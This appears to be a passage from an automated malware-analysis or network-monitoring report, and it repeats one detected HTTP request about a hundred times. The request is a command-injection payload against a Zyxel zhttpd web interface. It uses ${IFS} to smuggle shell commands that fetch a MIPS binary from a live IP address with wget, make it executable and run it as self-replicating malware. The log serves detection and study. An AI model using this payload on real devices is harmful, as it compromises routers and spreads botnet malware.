            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
